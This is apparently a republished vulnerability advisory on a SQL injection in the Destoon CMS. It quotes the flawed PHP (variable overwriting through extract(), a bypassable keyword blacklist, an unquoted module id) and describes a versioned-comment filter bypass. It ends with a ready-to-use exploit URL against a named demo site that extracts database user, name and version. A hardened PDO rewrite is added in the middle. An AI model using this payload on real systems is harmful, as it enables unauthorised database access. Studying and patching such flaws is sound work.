Destoon latest version: SQL injection vulnerability affecting all versions - vulnerability warning - Heiba Security Net (myhack58)

2013-11-02T00:00:00
ID MYHACK58:62201341115
Type myhack58
Reporter Anonymous (佚名)
Modified 2013-11-02T00:00:00

Description

Author: Kavia

/common.inc.php, line 64:

if($_POST) $_POST = strip_sql($_POST); // strip_sql() filter
if($_GET) $_GET = strip_sql($_GET);
if($_COOKIE) $_COOKIE = strip_sql($_COOKIE);
.........
if($_POST) extract($_POST, EXTR_SKIP); // registers request parameters as variables
if($_GET) extract($_GET, EXTR_SKIP);

Following strip_sql():

/include/global.func.php, line 186:

function strip_sql($string) {
    // keyword blacklist: each keyword is matched only when followed by whitespace or a slash
    $search = array(
        "/union([[:space:]\/])/i", "/select([[:space:]\/])/i", "/update([[:space:]\/])/i",
        "/replace([[:space:]\/])/i", "/delete([[:space:]\/])/i", "/drop([[:space:]\/])/i",
        "/outfile([[:space:]\/])/i", "/dumpfile([[:space:]\/])/i",
        "/load_file\(/i", "/substring\(/i", "/ascii\(/i", "/hex\(/i", "/ord\(/i", "/char\(/i"
    );
    // NB: as reproduced here the replacements read identically to the matches; in the shipped
    // source the first letter of each is presumably written as an HTML entity (e.g. &#117;nion),
    // which the page extraction has decoded.
    $replace = array(
        'union\\1', 'select\\1', 'update\\1', 'replace\\1', 'delete\\1', 'drop\\1',
        'outfile\\1', 'dumpfile\\1',
        'load_file(', 'substring(', 'ascii(', 'hex(', 'ord(', 'char('
    );
    return is_array($string) ? array_map('strip_sql', $string) : preg_replace($search, $replace, $string);
}

The new version uses a new regular expression; the exp previously released by Xidu (西毒) can no longer bypass the new version's filter.

Here you can use the new bypass way:/! 5000union*/

First, look for an injection point:

/module/member/record.inc.php, line 16:

isset($mid) or $mid = 0;
isset($currency) or $currency = '';
$module_select = module_select('mid', $L['module_name'], $mid);
if($keyword) $condition .= "AND title LIKE '%$keyword%'";
if($fromtime) $condition .= "AND paytime>".(strtotime($fromtime.' 00:00:00'));
if($totime) $condition .= "AND paytime<".(strtotime($totime.' 23:59:59'));
if($mid) $condition .= "AND moduleid=$mid"; // interpolated unquoted
if($itemid) $condition .= "AND itemid=$itemid";
if($currency) $condition .= "AND currency='$currency'";
$r = $db->get_one("SELECT COUNT(*) AS num FROM {$DT_PRE}finance_pay WHERE $condition");
$pages = pages($r['num'], $page, $pagesize);
$lists = array();
echo "SELECT * FROM {$DT_PRE}finance_pay WHERE $condition ORDER BY pid DESC LIMIT $offset,$pagesize";
$result = $db->query("SELECT * FROM {$DT_PRE}finance_pay WHERE $condition ORDER BY pid DESC LIMIT $offset,$pagesize");

Here, because extract() registers request parameters as variables (variable overwriting) and they are concatenated into the query, SQL injection can be constructed successfully.

/member/record.php:

<?php
require 'config.inc.php';
require '../common.inc.php';
require DT_ROOT.'/module/'.$module.'/record.inc.php';
?>

common.inc.php is included, so variable overwriting is possible, and the regex filter can be bypassed; the end result is SQL injection.
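A hardened rewrite of the query-building logic quoted above, added here as an example; it is not Destoon's own code and not the advisory author's. It assumes PHP 7 with PDO, and the names $pdo, $username (the member the listing is scoped to) and the table-prefix argument are assumptions standing in for the application's own globals. It removes both root causes at once: request parameters are read explicitly rather than via extract(), so nothing in the request can overwrite a local variable, and every value reaches the database as a bound parameter, so the strip_sql() keyword blacklist is no longer load-bearing.

```php
<?php
// Added example (not Destoon's code): hardened rewrite of record.inc.php's query building.
// Hypothetical assumptions: a PDO connection $pdo, the logged-in member's name $username,
// and the table prefix passed in as $prefix (Destoon keeps it in $DT_PRE).

/**
 * Build the WHERE clause and its bound parameters from the request array.
 * Returns array($whereSql, $params); no request data ever enters the SQL text.
 */
function build_pay_condition(array $get, string $username): array
{
    // Read each parameter explicitly instead of extract($_GET): the request can no
    // longer overwrite locals such as $condition, $offset or $pagesize.
    $keyword  = isset($get['keyword'])  ? (string)$get['keyword']  : '';
    $fromtime = isset($get['fromtime']) ? (string)$get['fromtime'] : '';
    $totime   = isset($get['totime'])   ? (string)$get['totime']   : '';
    $mid      = isset($get['mid'])      ? (int)$get['mid']         : 0; // (int): trailing SQL is dropped
    $itemid   = isset($get['itemid'])   ? (int)$get['itemid']      : 0;
    $currency = isset($get['currency']) ? (string)$get['currency'] : '';

    $where  = array('username = :username');            // always at least one predicate
    $params = array(':username' => $username);

    if ($keyword !== '') {
        // Escape LIKE metacharacters so a user cannot widen the match with % or _.
        $where[] = 'title LIKE :keyword';
        $params[':keyword'] = '%' . addcslashes($keyword, '%_\\') . '%';
    }
    if ($fromtime !== '' && ($ts = strtotime($fromtime . ' 00:00:00')) !== false) {
        $where[] = 'paytime > :fromtime';
        $params[':fromtime'] = $ts;
    }
    if ($totime !== '' && ($ts = strtotime($totime . ' 23:59:59')) !== false) {
        $where[] = 'paytime < :totime';
        $params[':totime'] = $ts;
    }
    if ($mid > 0) {                                     // ids are positive; -1 is simply ignored
        $where[] = 'moduleid = :mid';
        $params[':mid'] = $mid;
    }
    if ($itemid > 0) {
        $where[] = 'itemid = :itemid';
        $params[':itemid'] = $itemid;
    }
    if ($currency !== '') {
        $where[] = 'currency = :currency';
        $params[':currency'] = $currency;
    }
    return array(implode(' AND ', $where), $params);
}

/**
 * Run the listing query with bound parameters and integer-bound LIMIT operands.
 */
function fetch_pay_records(PDO $pdo, string $prefix, string $username, array $get): array
{
    // The prefix comes from configuration, not the request, but identifiers cannot be
    // bound as parameters, so validate its shape before interpolating it.
    if (!preg_match('/^[A-Za-z0-9_]*$/', $prefix)) {
        throw new InvalidArgumentException('invalid table prefix');
    }
    list($whereSql, $params) = build_pay_condition($get, $username);

    $page     = isset($get['page']) ? max(1, (int)$get['page']) : 1;
    $pagesize = 20;                                     // fixed server-side, not from the request
    $offset   = ($page - 1) * $pagesize;

    $stmt = $pdo->prepare("SELECT * FROM {$prefix}finance_pay WHERE {$whereSql}"
                        . ' ORDER BY pid DESC LIMIT :offset, :pagesize');
    foreach ($params as $name => $value) {
        $stmt->bindValue($name, $value, is_int($value) ? PDO::PARAM_INT : PDO::PARAM_STR);
    }
    // LIMIT operands must be bound as integers; PDO would otherwise quote them as strings.
    $stmt->bindValue(':offset', $offset, PDO::PARAM_INT);
    $stmt->bindValue(':pagesize', $pagesize, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Usage (assumed globals): $rows = fetch_pay_records($pdo, $DT_PRE, $username, $_GET);
```

Because the SQL text never contains request data, tricks aimed at the regex blacklist (such as the MySQL versioned-comment form the advisory relies on) have nothing to act on; strip_sql() can remain as defence in depth, but it is no longer the control the query depends on.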

exp: the http://demo.destoon.com/v5.0/member/record.php?action=pay&mid=-1/! 50000union//! 50000select/user(),2,database(),version(),5,6,7,8,9--